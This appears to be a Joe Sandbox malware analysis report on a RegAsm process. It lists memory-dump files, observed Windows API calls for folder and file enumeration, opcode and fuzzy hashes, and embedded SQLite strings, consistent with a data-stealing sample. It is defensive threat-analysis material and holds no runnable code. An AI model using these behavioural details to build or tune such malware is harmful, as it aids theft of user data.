                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3470314060-0
                                                                                                                                                                                                                                        • Opcode ID: 3bb7098c004e6e0b868fb9e12c9edf3dfe0681dcdbad557e99bda5bbdbeb0f1b
                                                                                                                                                                                                                                        • Instruction ID: 1427177a95c760848ccbda204b7d26ea2269305e609c9ae0dd80fe0dd36cfa04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bb7098c004e6e0b868fb9e12c9edf3dfe0681dcdbad557e99bda5bbdbeb0f1b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F01C431A01611ABDB20AB6598157EE7760FF08764F11411BE45063390C73C9EC2CFDE
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
                                                                                                                                                                                                                                        • API String ID: 0-593389478
                                                                                                                                                                                                                                        • Opcode ID: c43e6254c2f0ebfb508613e6eb4f42ba81a47990660b3518b5e44d943144c3d3
                                                                                                                                                                                                                                        • Instruction ID: 0120cbe9b83f0ca8d7e6b169f9ccae29cf4e103d5a7f8ec64085e31e57e2ac58
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c43e6254c2f0ebfb508613e6eb4f42ba81a47990660b3518b5e44d943144c3d3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45410735E042069FD714CE28DA80B5AB3A4FF84314F18856DE9468BAB1E77AFC45CBD1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000104,01461D70), ref: 00417697
                                                                                                                                                                                                                                          • Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 004176BE
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004176DE
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004176F2
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,014539C0), ref: 00417705
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00417719
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,01461578), ref: 0041772D
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7
                                                                                                                                                                                                                                          • Part of subcall function 004173C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004173EE
                                                                                                                                                                                                                                          • Part of subcall function 004173C0: HeapAlloc.KERNEL32(00000000), ref: 004173F5
                                                                                                                                                                                                                                          • Part of subcall function 004173C0: wsprintfA.USER32 ref: 0041740E
                                                                                                                                                                                                                                          • Part of subcall function 004173C0: FindFirstFileA.KERNEL32(?,?), ref: 00417425
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 167551676-0
                                                                                                                                                                                                                                        • Opcode ID: 8876f39cce22fdb87c7a47d4661a8add8284090edec9c7919bf3d1b7426972d0
                                                                                                                                                                                                                                        • Instruction ID: 9e94d96a6c2fa7cf23f7c992aa699a2e18ad3ccda8d2e94c686f4496ebe02aa9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8876f39cce22fdb87c7a47d4661a8add8284090edec9c7919bf3d1b7426972d0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08419AB5900219ABCB10EBA1CC46FDD7778AB0D704F40459EF715A3191DB78A788CFA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F7BA
                                                                                                                                                                                                                                          • Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC75
                                                                                                                                                                                                                                          • Part of subcall function 0041FC60: __CxxThrowException@8.LIBCMT ref: 0041FC8A
                                                                                                                                                                                                                                          • Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC9B
                                                                                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F7F7
                                                                                                                                                                                                                                          • Part of subcall function 0041FC13: std::exception::exception.LIBCMT ref: 0041FC28
                                                                                                                                                                                                                                          • Part of subcall function 0041FC13: __CxxThrowException@8.LIBCMT ref: 0041FC3D
                                                                                                                                                                                                                                          • Part of subcall function 0041FC13: std::exception::exception.LIBCMT ref: 0041FC4E
                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0040F858
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 85833692-4289949731
                                                                                                                                                                                                                                        • Opcode ID: 259f7feb66d68c8b8732089a7e33fb221ea85756fea1742300547b64a0c07829
                                                                                                                                                                                                                                        • Instruction ID: fd4a6935f257f4bdd60dc841e67110243277f01f0b010555ef6c2c1b1382e91b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 259f7feb66d68c8b8732089a7e33fb221ea85756fea1742300547b64a0c07829
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F31F4333002149BD730AE5CE880BAAF399EBA1764B24093FF141DB6C1D775DC4983A9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
                                                                                                                                                                                                                                        • API String ID: 0-453588374
                                                                                                                                                                                                                                        • Opcode ID: 8780d5e74ce8d3fe06a7d0c066df0400f9be85ca0d1d4f1c02c14058728aa280
                                                                                                                                                                                                                                        • Instruction ID: 0ad3724a1f8a036ffa0368372d7f011d751d99c98d7e454242c6475d9265c895
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8780d5e74ce8d3fe06a7d0c066df0400f9be85ca0d1d4f1c02c14058728aa280
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90315CB7A0434887EF1D4725FC0BB9B33575B80304FAD8429E4DA8BBC2E526E8478391
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: 6986c8b8b4bf75ede1cf54f1b9715d30e9f0f5a7aedb652287e03fd62befbb74
                                                                                                                                                                                                                                        • Instruction ID: 7d01215da911f08e21d37f4b5d97603ed994f02e5adbccb1fc7267de6dd485a4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6986c8b8b4bf75ede1cf54f1b9715d30e9f0f5a7aedb652287e03fd62befbb74
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD315836640B904BC724DF29D890AF3BFF29F55711B98845CE9C24B796E732E842CB60
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C51D3C
                                                                                                                                                                                                                                        • unknown database: %s, xrefs: 19C51CBD
                                                                                                                                                                                                                                        • misuse, xrefs: 19C51D46
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C51D4B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
                                                                                                                                                                                                                                        • API String ID: 0-142545749
                                                                                                                                                                                                                                        • Opcode ID: 32500f33b56783e203641610ec8e10fd752752dde09057e3228080d0baf6f832
                                                                                                                                                                                                                                        • Instruction ID: 77753281b343dcff3b22072e3b06a9389f875df39ac6f49256c7ddeb9a7a36bf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32500f33b56783e203641610ec8e10fd752752dde09057e3228080d0baf6f832
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC214776600790ABF7119B26EC88F977BA9AFC1369F1C052CF89A572C1D732E4008376
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: e48418b1412880d60a4bf96d523ba1b47a3f5f858f83a46dabc2c344a79a5ec8
                                                                                                                                                                                                                                        • Instruction ID: 5eaa5dcb2d37e1c5dbf62e00961bab35ad11636a59460b3a24a07a5101ba9a26
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e48418b1412880d60a4bf96d523ba1b47a3f5f858f83a46dabc2c344a79a5ec8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC2128776402215BC700DE08EC409FBBBE0EB84A21F89453AFD84D7341E725D549C7E2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                        • API String ID: 0-2528248365
                                                                                                                                                                                                                                        • Opcode ID: 9f63ef43a5964c9b72427a1e2a6228db14c9e9bdf974dfca040cd901e6cb7eb0
                                                                                                                                                                                                                                        • Instruction ID: 66209201bbc5257bbaf6f3938a9f80d9873f22934d037b6ab2f99ef8c9e479bc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f63ef43a5964c9b72427a1e2a6228db14c9e9bdf974dfca040cd901e6cb7eb0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B213736644BA05BC721DB28EC80AF3BFF19F05210B8D895CE1D287796E232E4858751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 19C633D6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
                                                                                                                                                                                                                                        • API String ID: 0-1935849370
                                                                                                                                                                                                                                        • Opcode ID: e994d7f808833fbe827c4a9f6a6445e99c95a842f14982c62c83e484a6c116d4
                                                                                                                                                                                                                                        • Instruction ID: d5f8945a35d8ba52e83a72763158c61712bdae0bf871b4046ca0a6db695d007b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e994d7f808833fbe827c4a9f6a6445e99c95a842f14982c62c83e484a6c116d4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F01D23A7042138BD702DF19E840B8AB3E6EFC5311F19C176F6408B280EB70A48787A1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Wrong number of entries in %%%s table - expected %lld, actual %lld, xrefs: 19D23E6C
                                                                                                                                                                                                                                        • SELECT count(*) FROM %Q.'%q%s', xrefs: 19D23E26
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
